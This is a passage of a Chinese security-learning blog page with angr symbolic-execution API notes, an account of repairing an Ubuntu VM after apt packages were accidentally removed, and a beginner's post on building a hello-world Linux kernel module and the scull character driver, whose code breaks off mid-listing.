class="line">state.memory.store(state.regs.rsp,data) </span><br><span class="line">state.memory.load(state.regs.rsp, <span class="number">0x40</span>) <span class="comment"># 这里可以直接通过地址来进行存储不一定要寄存器，满足BVV的操作就行</span></span><br><span class="line"></span><br><span class="line">state.posix.dumps(<span class="number">0</span>) <span class="comment"># dump运行时标准输入</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#################  SimulationManager操作</span></span><br><span class="line">sm = p.factory.simgr(state)</span><br><span class="line">sm.explore(find=<span class="number">0x400591</span>)</span><br><span class="line">st = sm.found[<span class="number">0</span>] <span class="comment"># 通过found[0]拿到的是此时的state，可以再通过上面state的操作dump标准输入</span></span><br><span class="line"></span><br><span class="line">st.se.eval(args,cast_to=str) <span class="comment"># 当然如果用到了 BVS 的话就可以使用cast_to来转成普通字符串了</span></span><br></pre></td></tr></table></figure>

<hr>
<blockquote>
<p>参考文章:<a href="https://www.secpulse.com/archives/83197.html" target="_blank" rel="noopener">https://www.secpulse.com/archives/83197.html</a></p>
</blockquote>

      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

        
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block home" lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/04/01/%E8%AE%B0%E5%BD%95%E4%B8%80%E6%AC%A1%E8%99%9A%E6%8B%9F%E6%9C%BA%E8%AF%AF%E5%88%A0apt%E5%8C%85%E5%90%8E%E7%9A%84%E9%87%8D%E6%96%B0%E6%81%A2%E5%A4%8D/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Coldshield">
      <meta itemprop="description" content="分享一些bin学习日常">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Coldshield's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
            <a href="/2020/04/01/%E8%AE%B0%E5%BD%95%E4%B8%80%E6%AC%A1%E8%99%9A%E6%8B%9F%E6%9C%BA%E8%AF%AF%E5%88%A0apt%E5%8C%85%E5%90%8E%E7%9A%84%E9%87%8D%E6%96%B0%E6%81%A2%E5%A4%8D/" class="post-title-link" itemprop="url">记录一次虚拟机误删apt包后的重新恢复</a>
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-04-01 02:11:44" itemprop="dateCreated datePublished" datetime="2020-04-01T02:11:44+08:00">2020-04-01</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-04-06 19:42:29" itemprop="dateModified" datetime="2020-04-06T19:42:29+08:00">2020-04-06</time>
              </span>

          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2020/04/01/%E8%AE%B0%E5%BD%95%E4%B8%80%E6%AC%A1%E8%99%9A%E6%8B%9F%E6%9C%BA%E8%AF%AF%E5%88%A0apt%E5%8C%85%E5%90%8E%E7%9A%84%E9%87%8D%E6%96%B0%E6%81%A2%E5%A4%8D/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2020/04/01/%E8%AE%B0%E5%BD%95%E4%B8%80%E6%AC%A1%E8%99%9A%E6%8B%9F%E6%9C%BA%E8%AF%AF%E5%88%A0apt%E5%8C%85%E5%90%8E%E7%9A%84%E9%87%8D%E6%96%B0%E6%81%A2%E5%A4%8D/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="记录一次apt包误删后的恢复"><a href="#记录一次apt包误删后的恢复" class="headerlink" title="记录一次apt包误删后的恢复"></a>记录一次apt包误删后的恢复</h1><p>愚人节的第一个惊喜？？？</p>
<p>昨天本来是换ubuntu16 py3环境的，先删掉了自己原生的py3，可惜脑残从网上复制命令的时候可能有一句autoremove之类的东西？我所有ubuntu原生与py3有关的apt包怕是全被删完…..当时删了600多M没在意，然后用的时候只是发现终端坏了，gedit没了，然后在终端还仅存的时候装上了gnome-terminal和gedit，现在想想都后怕，要是当时没装上还得在那个黑洞洞的Xterm里面重装</p>
<p>然后今天来操作的时候偶然一个什么操作触发了崩盘</p>
<p><img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20200401161311509.png" alt="image-20200401161311509"></p>
<p>图形化界面几乎是崩了一半了，窗口也拖不动只有命令行和这个可怜的桌面上几个文件夹和我打交道（幸好终端滚动条还能用），开机可以正常开，不过此时可以看到网络是断开的：</p>
<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20200401162339042.png" alt="image-20200401162339042" style="zoom: 80%;">

<h1 id="第一步：终端"><a href="#第一步：终端" class="headerlink" title="第一步：终端"></a>第一步：终端</h1><p>发现Ctrl+Alt+T没反应了，不清楚具体什么原因，但是右键桌面幸好还是可以开启terminal</p>
<h1 id="第二步：网络"><a href="#第二步：网络" class="headerlink" title="第二步：网络"></a>第二步：网络</h1><p>首先我面临的问题不是命令使用不了了，正常命令我都可以使用，但是我需要的是用apt把这些包全都装回来</p>
<p><img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20200401162540191.png" alt="image-20200401162540191"></p>
<p>直接ifconfig看的话就是这样的，下面是我的解决方案</p>
<p><code>sudo /sbin/dhclient</code>(在这条命令之前好像还尝试启动了一些服务之类的，由于是操作到一半来记录的所以前面几条可能就没有了，不过这条是最有效的，因为使用了之后我直接就可以ping通DNS和baidu了，重启之后也是和上面显示的一样，但是直接使用这条命令的话就可以瞬间通网，神奇)</p>
<p><code>sudo service network-manager start</code></p>
<p><code>sudo gedit /etc/NetworkManager/NetworkManager.conf</code> 把最后一行的false改成true，这下开机的时候就会自动有网了</p>
<h1 id="第三步：开始琢磨apt包"><a href="#第三步：开始琢磨apt包" class="headerlink" title="第三步：开始琢磨apt包"></a>第三步：开始琢磨apt包</h1><h2 id="桌面apt包"><a href="#桌面apt包" class="headerlink" title="桌面apt包"></a>桌面apt包</h2><p>还是先<code>sudo apt update &amp;&amp; sudo apt upgrade</code></p>
<p>之前换源的文件倒是没事，照样可用，但是upgrade的时候有内容不能fetch，所以先进行下面的操作</p>
<p><code>sudo apt install compiz</code></p>
<p><code>sudo apt install unity</code></p>
<p><code>sudo apt install gdebi</code></p>
<p><code>sudo apt install ubuntu-desktop</code></p>
<p><code>sudo apt-get install --reinstall ubuntu-desktop</code>(这个reinstall是照着敲的，也没多想)</p>
<p>这里还参考了知乎上的<a href="https://www.zhihu.com/question/41770698/answer/92270590" target="_blank" rel="noopener">这篇回答</a></p>
<p>然后桌面系统就恢复正常了</p>
<p>重新启动一切正常，Ctrl+Alt+T也可以使用了</p>
<h2 id="其他apt包（可能会长期更新）"><a href="#其他apt包（可能会长期更新）" class="headerlink" title="其他apt包（可能会长期更新）"></a>其他apt包（可能会长期更新）</h2><p>sudo apt install libxslt-dev<br>sudo apt install libjpeg-dev<br>sudo apt install python-pip</p>
<h1 id="后续"><a href="#后续" class="headerlink" title="后续"></a>后续</h1><p>之后因为系统报错所以我还执行了这两条命令，虽然不知道有没有用</p>
<p>sudo service apport restart</p>
<p>sudo systemctl restart apport</p>

      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

        
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block home" lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/23/kernel%E5%85%A5%E9%97%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Coldshield">
      <meta itemprop="description" content="分享一些bin学习日常">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Coldshield's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
            <a href="/2020/03/23/kernel%E5%85%A5%E9%97%A8/" class="post-title-link" itemprop="url">kernel入门</a>
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-03-23 18:07:41" itemprop="dateCreated datePublished" datetime="2020-03-23T18:07:41+08:00">2020-03-23</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-03-24 09:10:05" itemprop="dateModified" datetime="2020-03-24T09:10:05+08:00">2020-03-24</time>
              </span>

          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2020/03/23/kernel%E5%85%A5%E9%97%A8/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2020/03/23/kernel%E5%85%A5%E9%97%A8/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="kernel入门"><a href="#kernel入门" class="headerlink" title="kernel入门"></a>kernel入门</h1><h2 id="编译驱动程序"><a href="#编译驱动程序" class="headerlink" title="编译驱动程序"></a>编译驱动程序</h2><h3 id="hello-c"><a href="#hello-c" class="headerlink" title="hello.c"></a>hello.c</h3><hr>
<p><code>/usr/src/linux-headers-4.4.0-174/</code>  –&gt; 该内核源码目录<br><code>/usr/src/linux-headers-4.4.0-174-generic/</code>    –&gt; 该内核编译好的源码目录</p>
<hr>
<p>切到<code>/usr/src/linux-headers-4.4.0-174-generic</code>路径</p>
<p>然后<code>make menuconfig</code>，我<a href="https://blog.csdn.net/prophet10086/article/details/78459530" target="_blank" rel="noopener">照着</a>大致修改了一下有些没有开启的东西（乱开一通系列…）</p>
<p>切回我们第一个想编译的程序路径</p>
<p>第一个驱动程序<code>hello.c</code></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/init.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/module.h&gt;</span></span></span><br><span class="line">MODULE_LICENSE(<span class="string">"Dual BSD/GPL"</span>);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">hello_init</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">        printk(KERN_ALERT <span class="string">"Hello, world\n"</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">            </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">hello_exit</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">        printk(KERN_ALERT <span class="string">"Goodbye, cruel world\n"</span>);</span><br><span class="line">        </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">module_init(hello_init);</span><br><span class="line">module_exit(hello_exit);<span class="comment">//module_exit会将这个函数</span></span><br></pre></td></tr></table></figure>

<p>Makefile</p>
<figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># To build modules outside of the kernel tree, we run "make"</span></span><br><span class="line"><span class="comment"># in the kernel source tree; the Makefile these then includes this</span></span><br><span class="line"><span class="comment"># Makefile once again.</span></span><br><span class="line"><span class="comment"># This conditional selects whether we are being included from the</span></span><br><span class="line"><span class="comment"># kernel Makefile or not.</span></span><br><span class="line"><span class="keyword">ifeq</span> (<span class="variable">$(KERNELRELEASE)</span>,)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># Assume the source tree is where the running kernel was built</span></span><br><span class="line">    <span class="comment"># You should set KERNELDIR in the environment if it's elsewhere</span></span><br><span class="line">    KERNELDIR ?= /lib/modules/<span class="variable">$(<span class="built_in">shell</span> uname -r)</span>/build</span><br><span class="line">    <span class="comment"># The current directory is passed to sub-makes as argument</span></span><br><span class="line">    PWD := <span class="variable">$(<span class="built_in">shell</span> pwd)</span></span><br><span class="line"></span><br><span class="line"><span class="section">modules:</span></span><br><span class="line">	<span class="variable">$(MAKE)</span> -C <span class="variable">$(KERNELDIR)</span> M=<span class="variable">$(PWD)</span> modules</span><br><span class="line"></span><br><span class="line"><span class="section">modules_install:</span></span><br><span class="line">	<span class="variable">$(MAKE)</span> -C <span class="variable">$(KERNELDIR)</span> M=<span class="variable">$(PWD)</span> modules_install</span><br><span class="line"></span><br><span class="line"><span class="section">clean:</span></span><br><span class="line">	rm -rf *.o *~ core .depend .*.cmd *.ko *.mod.c .tmp_versions</span><br><span class="line"></span><br><span class="line"><span class="meta"><span class="meta-keyword">.PHONY</span>: modules modules_install clean</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span class="comment"># called from kernel build system: just declare what our modules are</span></span><br><span class="line">    obj-m := hello.o</span><br><span class="line"><span class="keyword">endif</span></span><br></pre></td></tr></table></figure>

<p>接着执行<code>make</code></p>
<p>编译好了之后就可以在目录下看到这个文件（kenel object缩写）</p>
<p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1584795814785.png" alt="1584795814785"></p>
<p>使用<code>sudo insmod hello.ko</code>即可加载该驱动程序（模块）    //此时会调用module_init设置的设备初始化函数</p>
<p><code>lsmod |grep hello</code>可以看到驱动被成功加载</p>
<p><code>tail /var/log/syslog</code>可以看到最后一行是程序的init加载就输出的内容</p>
<p><code>rmmod</code>移除模块    //此时会调用module_exit设置的设备退出函数</p>
<p><code>tail /var/log/syslog</code>也可以看到程序fini输出的内容了</p>
<h4 id="IDA界面如下"><a href="#IDA界面如下" class="headerlink" title="IDA界面如下"></a>IDA界面如下</h4><p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1584962662551.png" alt="1584962662551"></p>
<p>其中printk似乎会在字符串前面加上一个1，左边就可以看到我们的驱动有init和exit两个函数了</p>
<h2 id="在dev下增加驱动文件"><a href="#在dev下增加驱动文件" class="headerlink" title="在dev下增加驱动文件"></a>在dev下增加驱动文件</h2><p>参考来自：<a href="https://paper.seebug.org/779/#_2" target="_blank" rel="noopener">https://paper.seebug.org/779/#_2</a></p>
<p>这段代码很长，不过我主要只是理解了其中一个概念：<code>struct file_operations scull_fops</code>是啥</p>
<p>当然我当时编译的时候报错了，下面这段代码要加上一个<a href="https://blog.csdn.net/zbqwxy/article/details/8697896" target="_blank" rel="noopener">这个</a>，还有把<code>raw_copy_...</code>函数前面的<code>raw_</code>去掉</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br><span class="line">301</span><br><span class="line">302</span><br><span class="line">303</span><br><span class="line">304</span><br><span class="line">305</span><br><span class="line">306</span><br><span class="line">307</span><br><span class="line">308</span><br><span class="line">309</span><br><span class="line">310</span><br><span class="line">311</span><br><span class="line">312</span><br><span class="line">313</span><br><span class="line">314</span><br><span class="line">315</span><br><span class="line">316</span><br><span class="line">317</span><br><span class="line">318</span><br><span class="line">319</span><br><span class="line">320</span><br><span class="line">321</span><br><span class="line">322</span><br><span class="line">323</span><br><span class="line">324</span><br><span class="line">325</span><br><span class="line">326</span><br><span class="line">327</span><br><span class="line">328</span><br><span class="line">329</span><br><span class="line">330</span><br><span class="line">331</span><br><span class="line">332</span><br><span class="line">333</span><br><span class="line">334</span><br><span class="line">335</span><br><span class="line">336</span><br><span class="line">337</span><br><span class="line">338</span><br><span class="line">339</span><br><span class="line">340</span><br><span class="line">341</span><br><span class="line">342</span><br><span class="line">343</span><br><span class="line">344</span><br><span class="line">345</span><br><span class="line">346</span><br><span class="line">347</span><br><span class="line">348</span><br><span class="line">349</span><br><span class="line">350</span><br><span class="line">351</span><br><span class="line">352</span><br><span class="line">353</span><br><span class="line">354</span><br><span class="line">355</span><br><span class="line">356</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/init.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/module.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/kernel.h&gt;   /* printk() */</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/slab.h&gt;     /* kmalloc() */</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/fs.h&gt;       /* everything... */</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/errno.h&gt;    /* error codes */</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/types.h&gt;    /* size_t */</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/fcntl.h&gt;    /* O_ACCMODE */</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/cdev.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;asm/uaccess.h&gt;    /* copy_*_user */</span></span></span><br><span class="line"></span><br><span class="line">MODULE_LICENSE(<span class="string">"Dual BSD/GPL"</span>);</span><br><span class="line">MODULE_AUTHOR(<span class="string">"Hcamael"</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">int</span> scull_major =   <span class="number">0</span>;</span><br><span class="line"><span class="keyword">int</span> scull_minor =   <span class="number">0</span>;</span><br><span class="line"><span class="keyword">int</span> scull_nr_devs = <span class="number">4</span>;</span><br><span class="line"><span class="keyword">int</span> scull_quantum = <span class="number">4000</span>;</span><br><span class="line"><span class="keyword">int</span> scull_qset = <span class="number">1000</span>;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">scull_qset</span> &#123;</span></span><br><span class="line">    <span class="keyword">void</span> **data;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">scull_qset</span> *<span class="title">next</span>;</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">scull_dev</span> &#123;</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">scull_qset</span> *<span class="title">data</span>;</span>  <span class="comment">/* Pointer to first quantum set. */</span></span><br><span class="line">    <span class="keyword">int</span> quantum;              <span class="comment">/* The current quantum size. */</span></span><br><span class="line">    <span class="keyword">int</span> qset;                 <span class="comment">/* The current array size. */</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> <span class="built_in">size</span>;       <span class="comment">/* Amount of data stored here. */</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">int</span> access_key;  <span class="comment">/* Used by sculluid and scullpriv. */</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">mutex</span> <span class="title">mutex</span>;</span>       <span class="comment">/* Mutual exclusion semaphore. */</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">cdev</span> <span class="title">cdev</span>;</span>     <span class="comment">/* Char device structure. */</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">scull_dev</span> *<span class="title">scull_devices</span>;</span>    <span class="comment">/* allocated in scull_init_module */</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Follow the list.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function">struct scull_qset *<span class="title">scull_follow</span><span class="params">(struct scull_dev *dev, <span class="keyword">int</span> n)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">scull_qset</span> *<span class="title">qs</span> = <span class="title">dev</span>-&gt;<span class="title">data</span>;</span></span><br><span class="line"></span><br><span class="line">        <span class="comment">/* Allocate the first qset explicitly if need be. */</span></span><br><span class="line">    <span class="keyword">if</span> (! qs) &#123;</span><br><span class="line">        qs = dev-&gt;data = kmalloc(<span class="keyword">sizeof</span>(struct scull_qset), GFP_KERNEL);</span><br><span class="line">        <span class="keyword">if</span> (qs == <span class="literal">NULL</span>)</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">        <span class="built_in">memset</span>(qs, <span class="number">0</span>, <span class="keyword">sizeof</span>(struct scull_qset));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Then follow the list. */</span></span><br><span class="line">    <span class="keyword">while</span> (n--) &#123;</span><br><span class="line">        <span class="keyword">if</span> (!qs-&gt;next) &#123;</span><br><span class="line">            qs-&gt;next = kmalloc(<span class="keyword">sizeof</span>(struct scull_qset), GFP_KERNEL);</span><br><span class="line">            <span class="keyword">if</span> (qs-&gt;next == <span class="literal">NULL</span>)</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">            <span class="built_in">memset</span>(qs-&gt;next, <span class="number">0</span>, <span class="keyword">sizeof</span>(struct scull_qset));</span><br><span class="line">        &#125;</span><br><span class="line">        qs = qs-&gt;next;</span><br><span class="line">        <span class="keyword">continue</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> qs;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * 